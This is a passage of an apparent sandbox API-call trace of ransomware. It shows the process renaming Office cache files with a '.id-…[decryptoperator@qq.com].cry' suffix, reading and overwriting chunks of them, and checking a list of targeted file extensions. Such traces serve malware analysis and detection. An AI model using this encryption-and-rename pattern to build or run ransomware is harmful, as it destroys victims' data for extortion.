Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0035.575] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.575] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.575] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.575] ReadFile (in: hFile=0x178, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.699] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.699] ReadFile (in: hFile=0x178, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.837] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.837] ReadFile (in: hFile=0x178, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.200] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.200] WriteFile (in: hFile=0x178, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0036.213] SetEndOfFile (hFile=0x178) returned 1 [0036.213] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f20088 [0036.217] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.217] WriteFile (in: hFile=0x178, lpBuffer=0x3f20088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20088*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.218] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x56543e, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.218] WriteFile (in: hFile=0x178, lpBuffer=0x3f20088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20088*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.219] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfefcbb, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.219] WriteFile (in: hFile=0x178, lpBuffer=0x3f20088*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20088*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.220] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f20088 | out: hHeap=0x600000) returned 1 [0036.220] CloseHandle (hObject=0x178) returned 1 [0038.000] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0038.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.000] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.000] lstrlenW (lpString=".doc") returned 4 [0038.000] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.000] lstrlenW (lpString=".docx") returned 5 [0038.000] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.000] lstrlenW (lpString=".pdf") returned 4 [0038.000] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.000] lstrlenW (lpString=".xls") returned 4 [0038.000] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString=".xlsx") returned 5 [0038.001] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.001] lstrlenW (lpString=".ppt") returned 4 [0038.001] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString=".zip") returned 4 [0038.001] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString=".rar") returned 4 [0038.001] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString=".bz2") returned 4 [0038.001] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.001] lstrlenW (lpString=".7z") returned 3 [0038.001] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString=".dbf") returned 4 [0038.001] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString=".1cd") returned 4 [0038.001] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString=".jpg") returned 4 [0038.001] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.001] lstrlenW (lpString=".doc") returned 4 [0038.001] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString=".docx") returned 5 [0038.002] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0038.002] lstrlenW (lpString=".pdf") returned 4 [0038.002] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString=".xls") returned 4 [0038.002] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString=".xlsx") returned 5 [0038.002] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0038.002] lstrlenW (lpString=".ppt") returned 4 [0038.002] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.002] lstrlenW (lpString=".zip") returned 4 [0038.002] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString=".rar") returned 4 [0038.002] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString=".bz2") returned 4 [0038.002] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0038.002] lstrlenW (lpString=".7z") returned 3 [0038.002] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0038.002] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.002] lstrlenW (lpString=".dbf") returned 4 [0038.002] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0038.002] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.002] lstrlenW (lpString=".1cd") returned 4 [0038.002] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0038.002] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74 [0038.002] lstrlenW (lpString=".jpg") returned 4 [0038.002] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0038.003] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0038.003] lstrlenW (lpString="OutlookMUI.msi") returned 14 [0038.003] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0038.003] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2865664) returned 1 [0038.003] CloseHandle (hObject=0x178) returned 1 [0038.003] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 0x2020 [0038.003] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.003] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0038.607] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0038.607] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0038.607] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.607] ReadFile (in: hFile=0x178, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.794] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.794] ReadFile (in: hFile=0x178, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.858] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0038.858] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0038.858] ReadFile (in: hFile=0x178, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0038.886] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.887] WriteFile (in: hFile=0x178, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0039.034] SetEndOfFile (hFile=0x178) returned 1 [0039.034] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fe50c0 [0039.041] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.041] WriteFile (in: hFile=0x178, lpBuffer=0x3fe50c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe50c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xe9355, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.333] WriteFile (in: hFile=0x178, lpBuffer=0x3fe50c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe50c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.338] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x27ba00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0039.338] WriteFile (in: hFile=0x178, lpBuffer=0x3fe50c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe50c0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0039.340] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fe50c0 | out: hHeap=0x600000) returned 1 [0039.340] CloseHandle (hObject=0x178) returned 1 [0039.851] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0039.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.851] lstrlenW (lpString=".doc") returned 4 [0039.851] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.851] lstrlenW (lpString=".docx") returned 5 [0039.851] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.851] lstrlenW (lpString=".pdf") returned 4 [0039.851] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.851] lstrlenW (lpString=".xls") returned 4 [0039.851] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.851] lstrlenW (lpString=".xlsx") returned 5 [0039.851] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.851] lstrlenW (lpString=".ppt") returned 4 [0039.851] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.851] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.851] lstrlenW (lpString=".zip") returned 4 [0039.851] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.851] lstrlenW (lpString=".rar") returned 4 [0039.851] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.851] lstrlenW (lpString=".bz2") returned 4 [0039.851] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString=".7z") returned 3 [0039.852] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".dbf") returned 4 [0039.852] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".1cd") returned 4 [0039.852] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".jpg") returned 4 [0039.852] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".doc") returned 4 [0039.852] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString=".docx") returned 5 [0039.852] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0039.852] lstrlenW (lpString=".pdf") returned 4 [0039.852] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0039.852] lstrlenW (lpString=".xls") returned 4 [0039.852] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0039.852] lstrlenW (lpString=".xlsx") returned 5 [0039.852] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0039.852] lstrlenW (lpString=".ppt") returned 4 [0039.852] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".zip") returned 4 [0039.852] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0039.852] lstrlenW (lpString=".rar") returned 4 [0039.852] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0039.852] lstrlenW (lpString=".bz2") returned 4 [0039.852] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0039.852] lstrlenW (lpString=".7z") returned 3 [0039.852] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0039.852] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.852] lstrlenW (lpString=".dbf") returned 4 [0039.852] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0039.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.853] lstrlenW (lpString=".1cd") returned 4 [0039.853] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0039.853] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi") returned 77 [0039.853] lstrlenW (lpString=".jpg") returned 4 [0039.853] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0039.853] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0039.853] lstrlenW (lpString="WordMUI.msi") returned 11 [0039.853] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0039.853] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=2522624) returned 1 [0039.853] CloseHandle (hObject=0x178) returned 1 [0039.853] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020 [0039.853] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.853] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0039.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0039.854] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0039.854] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0039.854] ReadFile (in: hFile=0x178, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.071] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.071] ReadFile (in: hFile=0x178, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.097] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0040.097] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0040.097] ReadFile (in: hFile=0x178, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0040.152] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.152] WriteFile (in: hFile=0x178, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0040.185] SetEndOfFile (hFile=0x178) returned 1 [0040.185] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0040.185] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.185] WriteFile (in: hFile=0x178, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.187] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.187] WriteFile (in: hFile=0x178, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.192] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0040.192] WriteFile (in: hFile=0x178, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0040.374] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0040.374] CloseHandle (hObject=0x178) returned 1 [0040.657] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0040.657] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74 [0040.657] lstrlenW (lpString="C:\\MSOCache\\All 